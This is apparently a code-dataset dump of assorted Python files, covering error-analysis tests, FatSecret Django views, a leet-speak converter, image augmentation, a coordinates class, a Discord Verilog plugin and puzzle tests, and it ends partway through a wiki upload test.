id stringlengths 1 7 | text stringlengths 6 1.03M | dataset_id stringclasses 1
value |
|---|---|---|
3345520 | # Copyright (c) Microsoft Corporation
# Licensed under the MIT License.
from common_utils import (
create_iris_data, create_models_classification,
create_adult_census_data, create_kneighbors_classifier)
from erroranalysis._internal.error_analyzer import ModelAnalyzer
from erroranalysis._internal.surrogate_error_tree import (
create_surrogate_model, get_categorical_info, get_max_split_index,
traverse, TreeSide)
from erroranalysis._internal.constants import (PRED_Y,
TRUE_Y,
DIFF,
SPLIT_INDEX,
SPLIT_FEATURE,
LEAF_INDEX)
SIZE = 'size'
PARENTID = 'parentId'
ERROR = 'error'
ID = 'id'
class TestSurrogateErrorTree(object):
    """Integration tests for the surrogate error tree produced by
    erroranalysis on small sklearn datasets."""

    def test_surrogate_error_tree_iris(self):
        """The error tree should build for every classifier on iris data."""
        X_train, X_test, y_train, y_test, feature_names, _ = create_iris_data()
        models = create_models_classification(X_train, y_train)
        for model in models:
            categorical_features = []
            run_error_analyzer(model, X_test, y_test, feature_names,
                               categorical_features)

    def test_surrogate_error_tree_int_categorical(self):
        """The error tree should handle integer-coded categorical columns."""
        X_train, X_test, y_train, y_test, categorical_features = \
            create_adult_census_data()
        model = create_kneighbors_classifier(X_train, y_train)
        run_error_analyzer(model, X_test, y_test, list(X_train.columns),
                           categorical_features)

    def test_traverse_tree(self):
        """Build a surrogate LightGBM tree, traverse it, and verify that
        the traversal output matches the raw model_json structure."""
        X_train, X_test, y_train, y_test, categorical_features = \
            create_adult_census_data()
        model = create_kneighbors_classifier(X_train, y_train)
        feature_names = list(X_train.columns)
        error_analyzer = ModelAnalyzer(model, X_test, y_test,
                                       feature_names,
                                       categorical_features)
        categorical_info = get_categorical_info(error_analyzer,
                                                feature_names)
        cat_ind_reindexed, categories_reindexed = categorical_info
        pred_y = model.predict(X_test)
        # diff marks the rows the model got wrong; the surrogate fits this.
        diff = pred_y != y_test
        max_depth = 3
        num_leaves = 31
        min_child_samples = 20
        surrogate = create_surrogate_model(error_analyzer,
                                           X_test,
                                           diff,
                                           max_depth,
                                           num_leaves,
                                           min_child_samples,
                                           cat_ind_reindexed)
        model_json = surrogate._Booster.dump_model()
        tree_structure = model_json["tree_info"][0]['tree_structure']
        # +1 so leaf ids (offset by max_split_index) never collide with splits.
        max_split_index = get_max_split_index(tree_structure) + 1
        # NOTE(review): this aliases X_test, so the three assignments below
        # mutate the shared test frame in place — confirm that is intended.
        filtered_indexed_df = X_test
        filtered_indexed_df[DIFF] = diff
        filtered_indexed_df[TRUE_Y] = y_test
        filtered_indexed_df[PRED_Y] = pred_y
        tree = traverse(filtered_indexed_df,
                        tree_structure,
                        max_split_index,
                        (categories_reindexed,
                         cat_ind_reindexed),
                        [],
                        feature_names,
                        metric=error_analyzer.metric)
        # create dictionary from json tree id to values
        tree_dict = {}
        for entry in tree:
            tree_dict[entry['id']] = entry
        validate_traversed_tree(tree_structure, tree_dict,
                                max_split_index, feature_names)

    def test_min_child_samples(self):
        """The tree should respect a range of min_child_samples settings."""
        X_train, X_test, y_train, y_test, feature_names, _ = create_iris_data()
        model = create_kneighbors_classifier(X_train, y_train)
        categorical_features = []
        min_child_samples_list = [5, 10, 20]
        for min_child_samples in min_child_samples_list:
            run_error_analyzer(model, X_test, y_test, feature_names,
                               categorical_features,
                               min_child_samples=min_child_samples)
def run_error_analyzer(model, X_test, y_test, feature_names,
                       categorical_features, tree_features=None,
                       max_depth=3, num_leaves=31,
                       min_child_samples=20):
    """Compute an error tree for ``model`` and sanity-check its structure.

    Asserts that the tree exists, that its root carries the expected keys,
    covers the whole test set, and that every node respects the
    ``min_child_samples`` lower bound.
    """
    analyzer = ModelAnalyzer(model, X_test, y_test,
                             feature_names, categorical_features)
    selected = feature_names if tree_features is None else tree_features
    tree = analyzer.compute_error_tree(
        selected, None, None,
        max_depth=max_depth, num_leaves=num_leaves,
        min_child_samples=min_child_samples)
    assert tree is not None
    assert len(tree) > 0
    root = tree[0]
    for key in (ERROR, ID, PARENTID, SIZE):
        assert key in root
    assert root[PARENTID] is None
    assert root[SIZE] == len(X_test)
    assert all(node[SIZE] >= min_child_samples for node in tree)
def validate_traversed_tree(tree, tree_dict, max_split_index,
                            feature_names, parent_id=None):
    """Recursively compare a raw LightGBM tree node against the traversed
    representation stored in ``tree_dict``.

    Node ids are split indices for internal nodes and
    ``max_split_index + leaf_index`` for leaves; the root defaults to 0.
    """
    if SPLIT_INDEX in tree:
        node_id = tree[SPLIT_INDEX]
    elif LEAF_INDEX in tree:
        node_id = max_split_index + tree[LEAF_INDEX]
    else:
        node_id = 0
    entry = tree_dict[node_id]
    assert entry['id'] == node_id
    assert entry['parentId'] == parent_id
    expected_name = (feature_names[tree[SPLIT_FEATURE]]
                     if SPLIT_FEATURE in tree else None)
    assert entry['nodeName'] == expected_name
    # Leaves carry a 'leaf_value' and have no children to recurse into.
    if 'leaf_value' in tree:
        return
    for side in (TreeSide.LEFT_CHILD, TreeSide.RIGHT_CHILD):
        validate_traversed_tree(tree[side],
                                tree_dict,
                                max_split_index,
                                feature_names,
                                node_id)
| StarcoderdataPython |
84321 | # Create your views here.
from fatsecret import Fatsecret
from django.http import JsonResponse
from django.conf import settings
# Module-level FatSecret API client shared by every view below, configured
# from Django settings (FATSECRET_ACCESS_KEY / FATSECRET_SECRET_KEY).
fs = Fatsecret(settings.FATSECRET_ACCESS_KEY, settings.FATSECRET_SECRET_KEY)
def foods(request):
    """Search FatSecret for foods matching the ``search`` GET parameter.

    Returns a JsonResponse with key ``results`` holding up to 50 matches,
    or an error payload. POST requests are rejected; any other method
    falls through and returns None (unchanged behavior).
    """
    if request.method == 'GET':
        search = request.GET["search"]
        try:
            foods_detail = fs.foods_search(search, max_results=50,
                                           page_number=1)
        except Exception:
            # Narrowed from a bare ``except:`` which would also swallow
            # KeyboardInterrupt/SystemExit.
            foods_detail = {"error": "An error occured while processing."}
        return JsonResponse({"results": foods_detail})
    elif request.method == 'POST':
        return JsonResponse({"error": "must be a get method"})
def food(request):
    """Look up a single FatSecret food by the id in the ``search`` param."""
    if request.method == 'POST':
        return JsonResponse({"error": "must be a get method"})
    if request.method == 'GET':
        query = request.GET["search"]
        try:
            payload = fs.food_get(query)
        except Exception as ex:
            print(ex)
            payload = {"error": "An error occured while processing."}
        return JsonResponse({"results": payload})
def recipes(request):
    """Search FatSecret recipes matching the ``search`` GET parameter."""
    if request.method == 'POST':
        return JsonResponse({"error": "must be a get method"})
    if request.method == 'GET':
        query = request.GET["search"]
        try:
            payload = fs.recipes_search(query, max_results=50, page_number=1)
        except Exception as ex:
            print(ex)
            payload = {"error": "An error occured while processing."}
        return JsonResponse({"results": payload})
def recipe(request):
    """Fetch a single FatSecret recipe by the id in the ``search`` param."""
    if request.method == 'POST':
        return JsonResponse({"error": "must be a get method"})
    if request.method == 'GET':
        query = request.GET["search"]
        try:
            payload = fs.recipe_get(query)
        except Exception as ex:
            print(ex)
            payload = {"error": "An error occured while processing."}
        return JsonResponse({"results": payload})
| StarcoderdataPython |
167057 | # <NAME>
# ADS UNIFIP
# Exercicios Com Strings
# https://wiki.python.org.br/ExerciciosComStrings
'''
Leet spek generator. Leet é uma forma de se escrever o alfabeto latino usando outros símbolos em lugar das letras, como números por exemplo. A própria palavra leet admite muitas variações, como l33t ou 1337. O uso do leet reflete uma subcultura relacionada ao mundo dos jogos de computador e internet, sendo muito usada para confundir os iniciantes e afirmar-se como parte de um grupo. Pesquise sobre as principais formas de traduzir as letras. Depois, faça um programa que peça uma texto e transforme-o para a grafia leet speak.
'''
print('=' * 30)
print('{:*^30}'.format(' Leet spek generator '))
print('=' * 30)
print()
# Mapping from every uppercase letter of the Latin alphabet to its
# leet-speak replacement.
leet = {
    'A': '4',
    'B': '8',
    'C': '<',
    'D': '[)',
    'E': '&',
    'F': 'ph',
    'G': '6',
    'H': '#',
    'I': '1',
    'J': 'j',
    'K': '|<',
    'L': '|_',
    'M': '|\/|',
    'N': '/\/',
    'O': '0',
    'P': '|*',
    'Q': '9',
    'R': 'l2',
    'S': '5',
    'T': '7',
    'U': 'v',
    'V': 'V',
    'W': 'vv',
    'X': '><',
    'Y': '`/',
    'Z': '2'
}
texto = input('Informe um texto: ')
print()
# Walk the upper-cased input: letters are replaced by their leet
# equivalent, everything else becomes a single space.
for i in texto.upper():
    if i.isalpha():
        print(leet[i], end='')
    else:
        # Bug fix: the original printed the space with a trailing newline,
        # splitting the generated text onto a new line at every non-letter.
        print(' ', end='')
print()
| StarcoderdataPython |
3294888 | <filename>augment.py
#!/usr/bin/python
# -------------------------- IMPORTS -------------------------- #
import numpy as np
import random as rn
import scipy
import skimage.util
import skimage.transform
# -------------------------- CROP -------------------------- #
#
# image: image to be cropped, scale: scale factor, keep_original_size: keep image's original shape
def crop(image, scale=0.8, keep_original_size=True):
    '''
    Center-crop ``image`` to ``scale`` of its spatial size, optionally
    resizing the crop back to the original shape.

    Parameters:
        image: NumPy array of size NxMxC
        scale: float number between 0 and 1; values >= 1 return the
            image unchanged
        keep_original_size: boolean; when True the crop is interpolated
            back to NxM

    Returns:
        NumPy array; NxMxC when keep_original_size is True, otherwise
        the cropped (smaller) array.
    '''
    # Local import: scipy.misc.imresize was removed in SciPy 1.3, so the
    # resize is now done with scipy.ndimage.zoom (order-1 interpolation).
    import scipy.ndimage

    size_x, size_y, num_channels = image.shape
    if scale < 1:
        max_x = int(round(size_x * scale))
        max_y = int(round(size_y * scale))
        bias_x = int(round((size_x - max_x) / 2))
        bias_y = int(round((size_y - max_y) / 2))
        image = image[bias_x:bias_x + max_x, bias_y:bias_y + max_y, :]
        if keep_original_size:
            factors = (size_x / image.shape[0], size_y / image.shape[1], 1)
            image = scipy.ndimage.zoom(image, factors, order=1)
    return image
# -------------------------- METHOS TO RANDOMLY APPLY TRANSFORMATIONS -------------------------- #
def apply_random_rotation(image):
    '''
    Rotate ``image`` by a uniformly random angle in [0, 360] degrees.

    Parameters:
        image: NumPy array of size NxMxC
    '''
    ang = rn.randint(0, 360)
    # Bug fix: the original referenced the undefined names ``rotate`` and
    # ``n_image``; use the skimage.transform module (imported at file top)
    # on the actual ``image`` argument.
    return skimage.transform.rotate(image, angle=ang)
def apply_random_noise(image):
    '''
    Corrupt ``image`` with a randomly chosen salt/pepper-style noise and
    return the result as an 8-bit image.

    Parameters:
        image: NumPy array of size NxMxC
    '''
    # 'speckle' and 'gaussian' were deliberately left out of the pool.
    modes = ['pepper', 's&p', 'salt']
    chosen = modes[rn.randint(0, len(modes) - 1)]
    noisy = skimage.util.random_noise(image, mode=chosen)
    return (noisy * 255).astype(np.uint8)
def apply_random_cropping(image):
    '''
    Randomly center-crop ``image``, never removing more than 25% per axis.

    Parameters:
        image: NumPy array of size NxMxC
    '''
    roll = rn.random()
    # Crop only when the random scale stays >= 75%, so little info is lost.
    if roll < 0.75:
        return image
    return crop(image, scale=roll)
def apply_random_vertical_flip(image):
    '''
    Flip ``image`` upside down with 50% probability.

    Parameters:
        image: NumPy array of size NxMxC
    '''
    if rn.random() < 0.5:
        return image
    return np.flipud(image)
def apply_random_horizontal_flip(image):
    '''
    Mirror ``image`` left-right with 50% probability (the threshold in the
    code is 0.5, despite what the original comment claimed).

    Parameters:
        image: NumPy array of size NxMxC
    '''
    if rn.random() < 0.5:
        return image
    return np.fliplr(image)
# MAIN METHOD
def apply_random_transformations(image):
    '''
    Apply the full random augmentation pipeline (noise, crop, vertical and
    horizontal flip) using each step's default parameters.

    Parameters:
        image: NumPy array of size NxMxC (8-bit intensities)
    '''
    # random_noise expects intensities in [0, 1], so rescale first.
    out = apply_random_noise((image / 255.0).astype(float))
    for step in (apply_random_cropping,
                 apply_random_vertical_flip,
                 apply_random_horizontal_flip):
        out = step(out)
    return out
def augment_single_data(image, labels, num_new):
    '''
    Generate ``num_new`` randomly transformed copies of one labeled image.

    Parameters:
        image: NumPy array of size NxMxC
        labels: integer that defines the class of the image
        num_new: integer that defines the number of new samples

    Returns:
        (new_images, new_labels): float array of shape (num_new, N, M, C)
        and int array of shape (num_new,) filled with ``labels``.
    '''
    rows, cols, channels = image.shape
    new_images = np.empty([num_new, rows, cols, channels], dtype=float)
    new_labels = np.zeros([num_new], dtype=int)
    for idx in range(num_new):
        new_images[idx] = apply_random_transformations(image)
        new_labels[idx] = labels
    return new_images, new_labels
# -------------------------- Same as before but for one-hot encoding labels -------------------------- #
def augment_single_data_one_hot(image, labels, num_new):
    '''
    Generate ``num_new`` randomly transformed copies of one image whose
    label is given in one-hot encoding.

    Parameters:
        image: NumPy array of size NxMxC
        labels: NumPy array of size [1,N] -> label in one-hot encoding
        num_new: integer that defines the number of new samples

    Returns:
        (new_images, new_labels): float array (num_new, N, M, C) and int
        array (num_new, num_classes) with ``labels`` repeated per row.
    '''
    rows, cols, channels = image.shape
    new_images = np.empty([num_new, rows, cols, channels], dtype=float)
    new_labels = np.zeros([num_new, labels.shape[0]], dtype=int)
    for idx in range(num_new):
        new_images[idx] = apply_random_transformations(image)
        new_labels[idx] = labels
    return new_images, new_labels
# -------------------------- Taking off the original dataset, and keep only the augmentated samples -------------------------- #
# Returns an augmented dataset without the original values
def augment_data_one_hot(dataset, labels, num_new):
    '''
    Augment a dataset with one-hot labels, returning ONLY the newly
    generated samples (the originals are not included).

    Parameters:
        dataset: NumPy array of size ZxNxMxC (Z images of shape NxMxC)
        labels: NumPy array of size [Z, num_classes] in one-hot encoding
        num_new: number of new samples generated per original image
    '''
    n = dataset.shape[0]
    new_dataset = []
    new_labels = []
    for i in range(n):
        # Bug fix: augment_single_data_one_hot takes three arguments; the
        # original passed a spurious fourth (labels.shape[1]), which raised
        # TypeError on every call.
        feat, lab = augment_single_data_one_hot(dataset[i, :, :, :],
                                                labels[i, :], num_new)
        for c in range(feat.shape[0]):
            new_dataset.append(feat[c, :, :, :])
            new_labels.append(lab[c, :])
    return np.asarray(new_dataset), np.asarray(new_labels)
# -------------------------- METHODS TO BALANCE IMBALANCED DATASET -------------------------- #
def get_diff_binary_classes(target):
    '''
    Summarize the class imbalance of a binary label vector.

    Parameters:
        target: NumPy array of class labels (exactly two distinct classes)

    Returns:
        (minority_class_index, majority_class_index, counts, difference)
        where the indices point into the sorted unique classes, counts is
        the per-class instance count, and difference is |counts0 - counts1|.
    '''
    unique, counts = np.unique(target, return_counts=True)
    # The unused ``z = dict(zip(unique, counts))`` from the original was
    # removed; it was never read.
    majority_class_index = np.argmax(counts)
    minority_class_index = np.argmin(counts)
    difference = np.absolute(counts[0] - counts[1])
    return minority_class_index, majority_class_index, counts, difference
# This method balances an imbalanced dataset (usually the train set, although it
# can be used for an entire dataset). It only works for binary classes.
def balance_dataset(dataset, target):
    '''
    Balance an unbalanced dataset by oversampling (augmenting) the minority
    class until both classes have the same number of instances. It only
    works for binary classes.

    Parameters:
        dataset: NumPy array of size ZxNxMxC
        target: NumPy array of size (Z,) with binary class labels

    Returns:
        (new_dataset, new_target): the original data with the augmented
        minority samples appended.
    '''
    # Obtain info about the classes (index of majority/minority class, etc.)
    min_class_idx, maj_class_idx, counts, difference = \
        get_diff_binary_classes(target)
    # Python 3 fix: these were Python 2 print statements (SyntaxError on 3).
    print('Num. of instances for each class before augmentation: ', counts)
    # Augment minority-class instances until the counts match.
    new_dataset = dataset
    new_target = target
    counter = 0
    i = 0
    while i < target.shape[0]:
        if target[i] == min_class_idx:
            feature, label = augment_single_data(dataset[i, :, :, :],
                                                 target[i], 1)
            new_dataset = np.concatenate((new_dataset, feature), axis=0)
            new_target = np.concatenate((new_target, label), axis=0)
            counter = counter + 1
        if (i == target.shape[0] - 1) and (counter != difference):
            # Wrap around for another pass; -1 so the increment below
            # restarts at index 0 (the original restarted at 1 and always
            # skipped the first sample on subsequent passes).
            i = -1
        if counter == difference:
            break
        i = i + 1
    # Check that the result is balanced
    min_class_idx, maj_class_idx, counts, difference = \
        get_diff_binary_classes(new_target)
    print('Num. of instances for each class after augmentation: ', counts)
    return new_dataset, new_target
#
| StarcoderdataPython |
112302 | # coding:utf-8
# --author-- lanhua.zhou
import os
import json
import logging
__all__ = ["get_menu_data", "MENU_KEY", "MENU_FILE"]
# Resolve the package root relative to this module; the menu definition is
# expected at <package root>/conf/menu.json.
DIRNAME = os.path.dirname(__file__)
MENU_DIRNAME = os.path.dirname(os.path.dirname(DIRNAME))
MENU_FILE = "{}/conf/menu.json".format(MENU_DIRNAME)
# Known top-level menu categories, in display order.
MENU_KEY = ["utility", "modeling", "shading", "rigging",
            "assembly", "animation", "fx", "rendering", "help"]
logger = logging.getLogger(__name__)
def get_menu_data():
    """Load and parse the menu definition stored at MENU_FILE.

    rtype: list
    """
    logger.info("read menu json file data")
    with open(MENU_FILE, "r") as handle:
        raw = handle.read()
    return json.loads(raw)
31382 | <gh_stars>0
import numpy as np
from spharpy.samplings.helpers import sph2cart
from scipy.spatial import cKDTree
class Coordinates(object):
    """Container class for coordinates in a three-dimensional space, allowing
    for compact representation and convenient conversion into spherical as well
    as geospatial coordinate systems.

    The constructor as well as the internal representation are only
    available in Cartesian coordinates. To create a Coordinates object from
    a set of points in spherical coordinates, please use the
    Coordinates.from_spherical() method.

    Attributes
    ----------
    x : ndarray, double
        x-coordinate
    y : ndarray, double
        y-coordinate
    z : ndarray, double
        z-coordinate
    """

    def __init__(self, x=None, y=None, z=None):
        """Init coordinates container

        Parameters
        ----------
        x : ndarray, double
            x-coordinate
        y : ndarray, double
            y-coordinate
        z : ndarray, double
            z-coordinate

        Raises
        ------
        ValueError
            If the three arrays do not share the same shape.
        """
        super(Coordinates, self).__init__()
        x = np.asarray(x, dtype=np.float64)
        y = np.asarray(y, dtype=np.float64)
        z = np.asarray(z, dtype=np.float64)
        if not np.shape(x) == np.shape(y) == np.shape(z):
            raise ValueError("Input arrays need to have same dimensions.")
        self._x = x
        self._y = y
        self._z = z

    @property
    def x(self):
        """The x-axis coordinates for each point."""
        return self._x

    @x.setter
    def x(self, value):
        self._x = np.asarray(value, dtype=np.float64)

    @property
    def y(self):
        """The y-axis coordinate for each point."""
        return self._y

    @y.setter
    def y(self, value):
        self._y = np.asarray(value, dtype=np.float64)

    @property
    def z(self):
        """The z-axis coordinate for each point."""
        return self._z

    @z.setter
    def z(self, value):
        self._z = np.asarray(value, dtype=np.float64)

    @property
    def radius(self):
        """The radius for each point."""
        return np.sqrt(self.x**2 + self.y**2 + self.z**2)

    @radius.setter
    def radius(self, radius):
        # Changing the radius keeps the angular position of every point.
        x, y, z = sph2cart(np.asarray(radius, dtype=np.float64),
                           self.elevation,
                           self.azimuth)
        self._x = x
        self._y = y
        self._z = z

    @property
    def azimuth(self):
        """The azimuth angle for each point, wrapped to [0, 2*pi)."""
        return np.mod(np.arctan2(self.y, self.x), 2*np.pi)

    @azimuth.setter
    def azimuth(self, azimuth):
        x, y, z = sph2cart(self.radius,
                           self.elevation,
                           np.asarray(azimuth, dtype=np.float64))
        self._x = x
        self._y = y
        self._z = z

    @property
    def elevation(self):
        """The elevation angle for each point."""
        rad = self.radius
        return np.arccos(self.z/rad)

    @elevation.setter
    def elevation(self, elevation):
        x, y, z = sph2cart(self.radius,
                           np.asarray(elevation, dtype=np.float64),
                           self.azimuth)
        self._x = x
        self._y = y
        self._z = z

    @classmethod
    def from_cartesian(cls, x, y, z):
        """Create a Coordinates class object from a set of points in the
        Cartesian coordinate system.

        Parameters
        ----------
        x : ndarray, double
            x-coordinate
        y : ndarray, double
            y-coordinate
        z : ndarray, double
            z-coordinate
        """
        return Coordinates(x, y, z)

    @classmethod
    def from_spherical(cls, radius, elevation, azimuth):
        """Create a Coordinates class object from a set of points in the
        spherical coordinate system.

        Parameters
        ----------
        radius : ndarray, double
            The radius for each point
        elevation : ndarray, double
            The elevation angle in radians
        azimuth : ndarray, double
            The azimuth angle in radians
        """
        radius = np.asarray(radius, dtype=np.double)
        elevation = np.asarray(elevation, dtype=np.double)
        azimuth = np.asarray(azimuth, dtype=np.double)
        x, y, z = sph2cart(radius, elevation, azimuth)
        return Coordinates(x, y, z)

    @classmethod
    def from_array(cls, values, coordinate_system='cartesian'):
        """Create a Coordinates class object from a set of points given as
        numpy array

        Parameters
        ----------
        values : double, ndarray
            Array with shape Nx3 where N is the number of points.
        coordinate_system : string
            Coordinate convention of the given values.
            Can be Cartesian or spherical coordinates.

        Raises
        ------
        ValueError
            If the coordinate system is not supported.
        """
        coords = Coordinates()
        if coordinate_system == 'cartesian':
            coords.cartesian = values
        elif coordinate_system == 'spherical':
            coords.spherical = values
        else:
            # Bug fix: the original *returned* the ValueError instance
            # instead of raising it, handing callers an exception object.
            raise ValueError("This coordinate system is not supported.")
        return coords

    @property
    def latitude(self):
        """The latitude angle as used in geospatial coordinates."""
        return np.pi/2 - self.elevation

    @property
    def longitude(self):
        """The longitude angle as used in geospatial coordinates."""
        return np.arctan2(self.y, self.x)

    @property
    def cartesian(self):
        """Cartesian coordinates of all points as a 3xN array."""
        return np.vstack((self.x, self.y, self.z))

    @cartesian.setter
    def cartesian(self, value):
        self.x = value[0, :]
        self.y = value[1, :]
        self.z = value[2, :]

    @property
    def spherical(self):
        """Spherical coordinates of all points as a 3xN array
        (radius, elevation, azimuth)."""
        return np.vstack((self.radius, self.elevation, self.azimuth))

    @spherical.setter
    def spherical(self, value):
        # Docstring fix: this setter takes *spherical* values, not Cartesian.
        x, y, z = sph2cart(value[0, :], value[1, :], value[2, :])
        self.cartesian = np.vstack((x, y, z))

    @property
    def n_points(self):
        """Return number of points stored in the object."""
        return self.x.size

    def merge(self, other):
        """Merge another coordinates objects into this object."""
        data = np.concatenate(
            (self.cartesian, other.cartesian),
            axis=-1
        )
        self.cartesian = data

    def find_nearest_point(self, point):
        """Find the closest Coordinate point to a given Point.
        The search for the nearest point is performed using the scipy
        cKDTree implementation.

        Parameters
        ----------
        point : Coordinates
            Point to find nearest neighboring Coordinate

        Returns
        -------
        distance : ndarray, double
            Distance between the point and it's closest neighbor
        index : int
            Index of the closest point.
        """
        kdtree = cKDTree(self.cartesian.T)
        distance, index = kdtree.query(point.cartesian.T)
        return distance, index

    def __repr__(self):
        """repr for Coordinate class"""
        if self.n_points == 1:
            repr_string = "Coordinates of 1 point"
        else:
            repr_string = "Coordinates of {} points".format(self.n_points)
        return repr_string

    def __getitem__(self, index):
        """Return Coordinates at index"""
        return Coordinates(self._x[index], self._y[index], self._z[index])

    def __setitem__(self, index, item):
        """Set Coordinates at index"""
        self.x[index] = item.x
        self.y[index] = item.y
        self.z[index] = item.z

    def __len__(self):
        """Length of the object which is the number of points stored."""
        return self.n_points
class SamplingSphere(Coordinates):
    """Class for samplings on a sphere, optionally carrying a spherical
    harmonic order and per-point integration weights."""

    def __init__(self, x=None, y=None, z=None, n_max=None, weights=None):
        """Init for sampling class

        Parameters
        ----------
        x, y, z : ndarray, double
            Cartesian point coordinates
        n_max : int, optional
            Spherical harmonic order of the sampling
        weights : ndarray, double, optional
            Integration weights, one per sampling point
        """
        Coordinates.__init__(self, x, y, z)
        if n_max is not None:
            # Bug fix: np.int was deprecated in NumPy 1.20 and removed in
            # 1.24; the builtin int is the correct replacement.
            self._n_max = int(n_max)
        else:
            self._n_max = None
        if weights is not None:
            if len(x) != len(weights):
                raise ValueError("The number of weights has to be equal to "
                                 "the number of sampling points.")
            self._weights = np.asarray(weights, dtype=np.double)
        else:
            self._weights = None

    @property
    def n_max(self):
        """Spherical harmonic order."""
        return self._n_max

    @n_max.setter
    def n_max(self, value):
        # Bug fix: np.int removed from NumPy; use builtin int.
        self._n_max = int(value)

    @property
    def weights(self):
        """Sampling weights for numeric integration."""
        return self._weights

    @weights.setter
    def weights(self, weights):
        if len(weights) != self.n_points:
            raise ValueError("The number of weights has to be equal to "
                             "the number of sampling points.")
        self._weights = np.asarray(weights, dtype=np.double)

    @classmethod
    def from_coordinates(cls, coords, n_max=None, weights=None):
        """Generate a spherical sampling object from a coordinates object

        Parameters
        ----------
        coords : Coordinates
            Coordinate object

        Returns
        -------
        sampling : SamplingSphere
            Sampling on a sphere
        """
        return SamplingSphere(coords.x, coords.y, coords.z,
                              n_max=n_max, weights=weights)

    @classmethod
    def from_cartesian(cls, x, y, z, n_max=None, weights=None):
        """Create a SamplingSphere object from a set of points in the
        Cartesian coordinate system.

        Parameters
        ----------
        x : ndarray, double
            x-coordinate
        y : ndarray, double
            y-coordinate
        z : ndarray, double
            z-coordinate
        """
        return SamplingSphere(x, y, z, n_max, weights)

    @classmethod
    def from_spherical(cls, radius, elevation, azimuth,
                       n_max=None, weights=None):
        """Create a SamplingSphere object from a set of points in the
        spherical coordinate system.

        Parameters
        ----------
        radius : ndarray, double
            The radius for each point
        elevation : ndarray, double
            The elevation angle in radians
        azimuth : ndarray, double
            The azimuth angle in radians
        """
        radius = np.asarray(radius, dtype=np.double)
        elevation = np.asarray(elevation, dtype=np.double)
        azimuth = np.asarray(azimuth, dtype=np.double)
        x, y, z = sph2cart(radius, elevation, azimuth)
        return SamplingSphere(x, y, z, n_max, weights)

    @classmethod
    def from_array(cls, values, n_max=None, weights=None,
                   coordinate_system='cartesian'):
        """Create a SamplingSphere object from a set of points given as
        numpy array

        Parameters
        ----------
        values : double, ndarray
            Array with shape Nx3 where N is the number of points.
        coordinate_system : string
            Coordinate convention of the given values.
            Can be Cartesian or spherical coordinates.

        Raises
        ------
        ValueError
            If the coordinate system is not supported.
        """
        coords = SamplingSphere(n_max=n_max, weights=weights)
        if coordinate_system == 'cartesian':
            coords.cartesian = values
        elif coordinate_system == 'spherical':
            coords.spherical = values
        else:
            # Bug fix: the error was previously returned instead of raised.
            raise ValueError("This coordinate system is not supported.")
        return coords

    def __repr__(self):
        """repr for SamplingSphere class"""
        if self.n_points == 1:
            repr_string = "Sampling with {} point".format(self.n_points)
        else:
            repr_string = "Sampling with {} points".format(self.n_points)
        return repr_string
| StarcoderdataPython |
3391326 | from services.refresh_attendees import RefreshAttendees
from flask_api import status
from flask import jsonify
class RefreshController:
    """HTTP-facing controller that triggers a refresh of the attendee list."""

    def index(self):
        """Run the refresh job and translate its outcome into a response."""
        result = RefreshAttendees().refresh.run()
        if not result.is_success:
            return ({'status': 'Something wrong happen'},
                    status.HTTP_500_INTERNAL_SERVER_ERROR)
        return {'status': 'The attendees were refreshed'}
| StarcoderdataPython |
1672723 | <reponame>ecumene/Automata
import re
from nextcord.ext import commands
import httpx
from Plugin import AutomataPlugin
BARAB_API = "https://jackharrhy.dev/barab"
CODE_BLOCK_REGEX = "```[a-z]*\n(?P<content>[\s\S]*?)\n```"
HEADERS = {"Content-Type": "text/plain"}
code_block = re.compile(CODE_BLOCK_REGEX)
class Verilog(AutomataPlugin):
    """
    Verilog

    Made using https://jackharrhy.dev/barab
    """

    @commands.command()
    async def verilog(self, ctx: commands.Context):
        """Executes all code blocks in your message as verilog"""
        code = "\n\n".join(code_block.findall(ctx.message.content))
        async with httpx.AsyncClient() as client:
            response = await client.post(
                BARAB_API,
                headers=HEADERS,
                content=code.encode(),
                timeout=15.0
            )
        # Escape triple-backtick fences in the tool output so they cannot
        # terminate the surrounding Discord code block. Bug fix: the
        # original searched for FOUR backticks ("````"), which never matches
        # a three-backtick fence, leaving the reply exploitable/garbled.
        text = response.text.replace("```", "\\`\\`\\`")
        await ctx.send(f"```{text}```")
| StarcoderdataPython |
1734899 | <reponame>vyahello/search-words-puzzle
"""A test suite contains a set of test cases for the puzzle tool."""
from pathlib import Path
import pytest
from puzzle.__main__ import (
_random_words,
_validate_puzzle_grid_size,
_validate_puzzle_word,
_validate_puzzle_words_path,
)
pytestmark = pytest.mark.unittest
_test_path: Path = Path(__file__).parent / 'words.txt'
@pytest.mark.parametrize(
    'word, grid_size, path',
    (('foo', '1x1', Path('file.txt')), ('bar', '10x10', Path('file.log'))),
)
def test_valid_puzzle_payload(word: str, grid_size: str, path: Path) -> None:
    """Well-formed inputs must pass every validator without raising."""
    _validate_puzzle_word(word)
    _validate_puzzle_grid_size(grid_size)
    _validate_puzzle_words_path(path)
@pytest.mark.parametrize(
    'grid_size',
    ('fooxbar', '', '~-.+-",#@^&%*'),
)
def test_invalid_puzzle_grid_size(grid_size: str) -> None:
    """A malformed grid-size string must be rejected with ValueError."""
    with pytest.raises(ValueError):
        _validate_puzzle_grid_size(grid_size)
@pytest.mark.parametrize(
    'word',
    ('', 'AA', '100', '~-.+-",#@^&%*'),
)
def test_invalid_puzzle_word(word: str) -> None:
    """An empty, uppercase, numeric or symbolic word must be rejected."""
    with pytest.raises(ValueError):
        _validate_puzzle_word(word)
def test_invalid_puzzle_words_path() -> None:
    """A words file with a non-text extension must be rejected."""
    bad_path = Path('file.png')
    with pytest.raises(ValueError):
        _validate_puzzle_words_path(bad_path)
def test_random_words() -> None:
    """_random_words should yield exactly the requested number of words."""
    requested = 3
    picked = tuple(_random_words(_test_path, requested))
    assert len(picked) == requested, (
        f'Expected N words: {requested} '
        f'!= Actual N words: {len(picked)}'
    )
| StarcoderdataPython |
104961 | #TODO also test handling of bad input
import unittest
import test
import mapupload
import wikibrowser
import os, sys
from getpass import getpass
#LOG_PATH = "mapupload.log"
#log = WikiDustLogger(path=LOG_PATH)
class MapUploadTest(unittest.TestCase):
    """End-to-end check that MapUploader pushes a screenshot and map code to
    a wiki, or suppresses/raises the expected error for bad input.

    ``error`` is the exception type expected from the scenario; type(None)
    marks a scenario that should succeed.
    """

    def __init__(self, url, username, password, error):
        unittest.TestCase.__init__(self)
        self.url = url
        self.username = username
        self.password = password
        self.error = error

    def setUp(self):
        def noQuestions(message):
            return False
        mapupload.askQuestion = noQuestions  # don't ask to send error reports
        mapupload.DEFAULT_URL = self.url
        self.uploader = mapupload.MapUploader()
        self.checker = wikibrowser.Browser()
